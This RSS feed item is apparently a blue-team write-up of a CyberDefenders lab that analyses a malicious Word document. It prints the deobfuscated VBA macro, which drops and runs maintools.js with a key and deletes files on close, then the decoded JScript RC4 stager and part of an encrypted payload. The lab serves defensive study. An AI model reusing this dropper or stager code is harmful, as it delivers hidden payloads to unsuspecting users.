<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Jaws on Medium]]></title>
        <description><![CDATA[Stories by Jaws on Medium]]></description>
        <link>https://medium.com/@JawsZero?source=rss-2b3674ca8ff1------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*jULDMY-jYIEraH_i8eyO4Q.png</url>
            <title>Stories by Jaws on Medium</title>
            <link>https://medium.com/@JawsZero?source=rss-2b3674ca8ff1------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Mon, 18 May 2026 03:00:35 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@JawsZero/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Obfuscated Lab Writeup]]></title>
            <link>https://medium.com/@JawsZero/obfuscated-lab-writeup-9fbc836d3f6d?source=rss-2b3674ca8ff1------2</link>
            <guid isPermaLink="false">https://medium.com/p/9fbc836d3f6d</guid>
            <category><![CDATA[cyberdefenders-writeup]]></category>
            <category><![CDATA[blue-team]]></category>
            <category><![CDATA[cyberdefender]]></category>
            <category><![CDATA[soc-analyst]]></category>
            <category><![CDATA[malware-analysis]]></category>
            <dc:creator><![CDATA[Jaws]]></dc:creator>
            <pubDate>Wed, 13 May 2026 20:34:53 GMT</pubDate>
            <atom:updated>2026-05-13T20:36:43.679Z</atom:updated>
            <content:encoded><![CDATA[<h4>CyberDefenders Malware Analysis Lab</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/991/1*-NnVd-y4nc5VJUyiSBZvPA.png" /></figure><h4>Scenario</h4><p>While working as a SOC analyst, you may encounter alerts from the enterprise Endpoint Detection and Response (EDR) system regarding unusual activity on an end-user machine. In one instance, a user reported receiving an email containing a DOC file from an unknown sender. The user subsequently submitted the document for analysis to ensure it does not pose a security risk.</p><h4>Question 1</h4><p>What is the SHA256 hash of the DOC file?</p><h4>Answer 1</h4><p>A simple shasum command in terminal provides the answer:</p><pre>└─$ shasum -a 256 document                      <br>ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751  document</pre><h4>Question 2</h4><p>Multiple streams contain macros in this document. Provide the number of the lowest one.</p><h4>Answer 2</h4><p>I am using a new tool that I have not used before to answer this question. <a href="https://github.com/DidierStevens/DidierStevensSuite/blob/master/oledump.py">OleDump.py</a>.</p><p>I ran the tool on the document and got the following:</p><pre>└─$ python3 oledump.py document<br>  1:       114 &#39;\x01CompObj&#39;<br>  2:       284 &#39;\x05DocumentSummaryInformation&#39;<br>  3:       392 &#39;\x05SummaryInformation&#39;<br>  4:      8017 &#39;1Table&#39;<br>  5:      4096 &#39;Data&#39;<br>  6:       483 &#39;Macros/PROJECT&#39;<br>  7:        65 &#39;Macros/PROJECTwm&#39;<br>  8: M    7117 &#39;Macros/VBA/Module1&#39;<br>  9: m    1104 &#39;Macros/VBA/ThisDocument&#39;<br> 10:      3467 &#39;Macros/VBA/_VBA_PROJECT&#39;<br> 11:      2964 &#39;Macros/VBA/__SRP_0&#39;<br> 12:       195 &#39;Macros/VBA/__SRP_1&#39;<br> 13:      2717 &#39;Macros/VBA/__SRP_2&#39;<br> 14:       290 &#39;Macros/VBA/__SRP_3&#39;<br> 15:       565 &#39;Macros/VBA/dir&#39;<br> 16:        76 &#39;ObjectPool/_1541577328/\x01CompObj&#39;<br> 17: O   20301 &#39;ObjectPool/_1541577328/\x01Ole10Native&#39;<br> 18:      5000 &#39;ObjectPool/_1541577328/\x03EPRINT&#39;<br> 19:         6 &#39;ObjectPool/_1541577328/\x03ObjInfo&#39;<br> 20:    133755 &#39;WordDocument&#39;</pre><p>It shows 20 data streams. I can there are a few VBA macros in the file. The 8th data stream that is marked with an M means a macro with attributes according to the manual. Meaning 8 is the answer for this question.</p><pre>Overview of indicators:<br> M: Macro (attributes and code)<br> m: macro (attributes without code)<br> E: Error (code that throws an error when decompressed)<br> !: Unusual macro (code without attributes)<br> O: object (embedded file)<br> .: storage<br> R: root entry</pre><h4>Question 3</h4><p>What is the decryption key of the obfuscated code?</p><h4>Answer 3</h4><p>I need to now dig deeper into the data stream. So first I will have to select the data stream and use the vbadecompress tool to view the code in said stream.</p><pre>└─$ python3 oledump.py -s 8 -v document &gt; code.bin</pre><p>Using the above command I output the data stream to a file when I then opened in sublime to start deobfuscate the code. I did have to change the file type to .vbs in order to get syntax, which makes it a little easier to read.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DtdBwQR0ZsNGtSUTgs4MfQ.png" /></figure><p>I could put this into an LLM to make this quicker, but I really enjoy going through the code and changing the variables to make sense of the code myself.</p><p>Below is the code that I have mostly deofuscated and left some comments about what I think most parts do.</p><pre>Attribute VB_Name = &quot;Module1&quot;<br>Public String_1 As String<br>Public String_2 As String<br><br>&#39;Function 1 takes a byte and a long value and is a boolean&#39;<br>&#39;There is a single function here and its this one&#39;<br>Function Function_1(Byte_Array_1() As Byte, Long_1 As Long) As Boolean<br><br>&#39;byte 2 is set to 45&#39;<br>Dim Byte_2 As Byte<br>Byte_2 = 45<br><br>For i = 0 To Long_1 - 1<br>Byte_Array_1(i) = Byte_Array_1(i) Xor Byte_2<br>Byte_2 = ((Byte_2 Xor 99) Xor (i Mod 254))<br>Next i<br><br>Function_1 = True<br>End Function<br><br><br>Sub AutoClose()<br>On Error Resume Next<br>Kill String_1<br>On Error Resume Next<br><br>Set Object_1 = CreateObject(&quot;Scripting.FileSystemObject&quot;)<br>Object_1.DeleteFile String_2 &amp; &quot;\*.*&quot;, True<br>Set Object_1 = Nothing<br><br>End Sub<br><br>Sub AutoOpen()<br><br>On Error GoTo Error_Handler<br><br>Dim FreeFile_1<br>Dim Long_2 As Long<br>Dim Long_1 As Long<br><br>&#39;Long_2 is set to the length of the current file in bytes&#39;<br>Long_2 = FileLen(ActiveDocument.FullName)<br><br>FreeFile_1 = FreeFile<br>Open (ActiveDocument.FullName) For Binary As #FreeFile_1<br>Dim Byte_3() As Byte<br><br>&#39;turns Byte_3 into a Long with the value of the file length of the active documents full name&#39;<br>ReDim Byte_3(Long_2)<br>Get #FreeFile_1, 1, Byte_3<br><br>Dim String_3 As String<br>&#39;Takes the file name legnth in bytes and turns it into UFT32 Unicode&#39;<br>String_3 = StrConv(Byte_3, vbUnicode)<br><br>Dim Dim_1, Dim_2<br>Dim Dim_3<br>&#39;Dim_3 is a regular expression with the value starting with Mx0H8, set by the .pattern&#39;<br>Set Dim_3 = CreateObject(&quot;vbscript.regexp&quot;)<br>Dim_3.Pattern = &quot;MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh&quot;<br><br>&#39;Exectue works like replace, it returns with a Matchs Collection Object, which can contain 0 or more Match Objects.&#39;<br>&#39;Properties of this are read only&#39;<br>&#39;so determines if String_3 and Dim_3&#39;s pattern are the same and returns it to Dim_2&#39;<br>Set Dim_2 = Dim_3.Execute(String_3)<br><br>Dim Dim_4<br>If Dim_2.Count = 0 Then<br>GoTo Error_Handler<br>End If<br><br>For Each Dim_1 In Dim_2<br>Dim_4 = Dim_1.FirstIndex<br>Exit For<br><br>Next<br>Dim Byte_Array_2() As Byte<br>Dim Long_3 As Long<br>Long_3 = 16827<br>&#39;Byte_Array_2 turns into a Long array?&#39;<br>ReDim Byte_Array_2(Long_3)<br><br>Get #FreeFile_1, Dim_4 + 81, Byte_Array_2<br>If Not Function_1(Byte_Array_2(), Long_3 + 1) Then<br>GoTo Error_Handler<br>End If<br><br>&#39;checks the environment if there is a folder appdata, to check to see if the infected machine is running windows&#39;<br>String_2 = Environ(&quot;appdata&quot;) &amp; &quot;\Microsoft\Windows&quot;<br>Set Object_1 = CreateObject(&quot;Scripting.FileSystemObject&quot;)<br>If Not Object_1.FolderExists(String_2) Then<br>String_2 = Environ(&quot;appdata&quot;)<br>End If<br><br><br>Set Object_1 = Nothing<br>Dim Free_File_2<br>Free_File_2 = FreeFile<br><br>&#39;Sets/creates String_1 to appdata\Microsoft\Windows\maintools.js&#39;<br>String_1 = String_2 &amp; &quot;\&quot; &amp; &quot;maintools.js&quot;<br>&#39;Opens String_1 to edit&#39;<br>Open (String_1) For Binary As #Free_File_2<br><br>&#39;Put writes to the file, so it writes to Free_File_2, the 1 is an optional parameter for where to start(?). Then it writes the Byte_Array_2 to the file&#39;<br>&#39;Byte_Array_2:<br>&#39;First document name as an int (FreeFile_1). <br>&#39;then Dim_4 + 81 (I don&#39;t know what Set Dim_2 = Dim_3.Execute(String_3) is yet, so idk, it could just be 1 or 0 then + 81.)<br>&#39;I am not 100% sure about this section&#39;<br><br>Put #Free_File_2, 1, Byte_Array_2<br>Close #Free_File_2<br>Erase Byte_Array_2<br><br><br>&#39;creates a shell script and runs maintools.js with the key: EzZETcSXyKAdF_e5I2i1&#39;<br>Set Shell_Script = CreateObject(&quot;WScript.Shell&quot;)<br>Shell_Script.Run &quot;&quot;&quot;&quot; + String_1 + &quot;&quot;&quot;&quot; + &quot; EzZETcSXyKAdF_e5I2i1&quot;<br>ActiveDocument.Save<br>Exit Sub<br><br>Error_Handler:<br>Close #Free_File_2<br>ActiveDocument.Save<br><br>End Sub</pre><p>Here are some notes I wrote down about the different operators, I have never used VBScript before so this was a learning experience for me:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/464/1*PKwbdIaenW2j2qgMh1ahOA.png" /></figure><p>They key is: EzZETcSXyKAdF_e5I2i1</p><p>I am still quite new to this, but I really enjoy breaking down code.</p><h4>Question 4:</h4><p>What is the name of the dropped file?</p><h4>Answer 4:</h4><p>From the above code that I have commented, String_1 is set to the file name maintools.js.</p><pre>&#39;Sets/creates String_1 to appdata\Microsoft\Windows\maintools.js&#39;<br>String_1 = String_2 &amp; &quot;\&quot; &amp; &quot;maintools.js&quot;<br>&#39;Opens String_1 to edit&#39;<br>Open (String_1) For Binary As #Free_File_2</pre><h4>Question 5:</h4><p>This script uses what language?</p><h4>Answer 5:</h4><p>As its dropping a .js file, which the malicious code is inside. It easy to determine that the code is jscript.</p><h4>Question 6:</h4><p>What is the name of the variable that is assigned the command-line arguments?</p><h4>Answer 6:</h4><p>For the life of me I couldn’t find a way of getting the maintools.js file from the document without detonating it. So I looked around online and just ended up uploading it to <a href="https://hybrid-analysis.com/sample/3a065547adb0afc63e318c2fa1f682108664e602934490a898c3de1b23975628">Hybrid Analysis</a>. From there I looked at the strings that it found and got the answer: wvy1.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5GtmimmBR2hfBz9wsoKcQQ.png" /></figure><h4>Question 7:</h4><p>How many command-line arguments does this script expect?</p><h4>Answer 7:</h4><p>Going back to the documents macro, I can see that it only takes the single argument. That being the key.</p><pre>&#39;creates a shell script and runs maintools.js with the key: EzZETcSXyKAdF_e5I2i1&#39;<br>Set Shell_Script = CreateObject(&quot;WScript.Shell&quot;)<br>Shell_Script.Run &quot;&quot;&quot;&quot; + String_1 + &quot;&quot;&quot;&quot; + &quot; EzZETcSXyKAdF_e5I2i1&quot;<br>ActiveDocument.Save<br>Exit Sub</pre><h4>Question 8:</h4><p>What instruction is executed if this script encounters an error?</p><h4>Answer 8:</h4><p>Looking again through the Hybrid Analysis extracted strings, I can see that there is a catch statement that leads to the following:</p><pre>}catch (e)<br>{WScript.Quit();}</pre><h4>Question 9:</h4><p>What function returns the next stage of code (i.e. the first round of obfuscated code)?</p><h4>Answer 9:</h4><p>At this point I needed to see the contents of the maintools.js file. I went searching around and looked through the main guide for help. Using the code for the decryption after grabbing the payload I was able to get the following:</p><pre>try{var wvy1 = WScript.Arguments;var ssWZ = wvy1(0);var ES3c = y3zb();ES3c = LXv5(ES3c);ES3c = CpPT(ssWZ,ES3c);eval(ES3c);  <br>}catch (e)<br>{WScript.Quit();}<br><br>function MTvK(CgqD){var XwH7 = CgqD.charCodeAt(0);if (XwH7 === 0x2B || XwH7 === 0x2D) return 62<br>if (XwH7 === 0x2F || XwH7 === 0x5F) return 63<br> if (XwH7 &lt; 0x30) return -1<br>  if (XwH7 &lt; 0x30 + 10) return XwH7 - 0x30 + 26 + 26<br>   if (XwH7 &lt; 0x41 + 26) return XwH7 - 0x41<br>    if (XwH7 &lt; 0x61 + 26) return XwH7 - 0x61 + 26<br>   }<br><br>  function LXv5(d27x)<br><br>  {var LUK7 = &quot;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/&quot;;var i;var j;var n6T8;if (d27x.length % 4 &gt; 0)<br>  return;var CHlB = d27x.length;var V8eR = d27x.charAt(CHlB - 2) === &#39;=&#39; ? 2 : d27x.charAt(CHlB - 1) === &#39;=&#39; ? 1 : 0<br>  var mjqo = new Array(d27x.length * 3 / 4 - V8eR);var z8Ht = V8eR &gt; 0 ? d27x.length - 4 : d27x.length;var t2JG = 0;<br><br>  function XGH6 (b0tQ){mjqo[t2JG++] = b0tQ;}for (i = 0,j = 0; i &lt; z8Ht; i += 4,j += 3){n6T8 = (MTvK(d27x.charAt(i)) &lt;&lt; 18) | (MTvK(d27x.charAt(i + 1)) &lt;&lt; 12) | (MTvK(d27x.charAt(i + 2)) &lt;&lt; 6) | MTvK(d27x.charAt(i + 3));XGH6((n6T8 &amp; 0xFF0000) &gt;&gt; 16)<br>  XGH6((n6T8 &amp; 0xFF00) &gt;&gt; 8)<br>  XGH6(n6T8 &amp; 0xFF)<br> }if (V8eR === 2){n6T8 = (MTvK(d27x.charAt(i)) &lt;&lt; 2) | (MTvK(d27x.charAt(i + 1)) &gt;&gt; 4)<br> XGH6(n6T8 &amp; 0xFF)<br>}else if (V8eR === 1){n6T8 = (MTvK(d27x.charAt(i)) &lt;&lt; 10) | (MTvK(d27x.charAt(i + 1)) &lt;&lt; 4) | (MTvK(d27x.charAt(i + 2)) &gt;&gt; 2)<br>XGH6((n6T8 &gt;&gt; 8) &amp; 0xFF)<br>XGH6(n6T8 &amp; 0xFF)<br>}return mjqo<br>}<br><br>function CpPT(bOe3,F5vZ)<br>{var AWy7 = [];var V2Vl = 0;var qyCq;var mjqo = &#39;&#39;;for (var i = 0; i &lt; 256; i++)<br>{AWy7[i] = i;}for (var i = 0; i &lt; 256; i++)<br>{V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256;qyCq = AWy7[i];AWy7[i] = AWy7[V2Vl];AWy7[V2Vl] = qyCq;}var i = 0;var V2Vl = 0;for (var y = 0; y &lt; F5vZ.length; y++)<br>{i = (i + 1) % 256;V2Vl = (V2Vl + AWy7[i]) % 256;qyCq = AWy7[i];AWy7[i] = AWy7[V2Vl];AWy7[V2Vl] = qyCq;mjqo += String.fromCharCode(F5vZ[y] ^ AWy7[(AWy7[i] + AWy7[V2Vl]) % 256]);}return mjqo;}<br><br>function y3zb()<br>{var qGxZ = &quot;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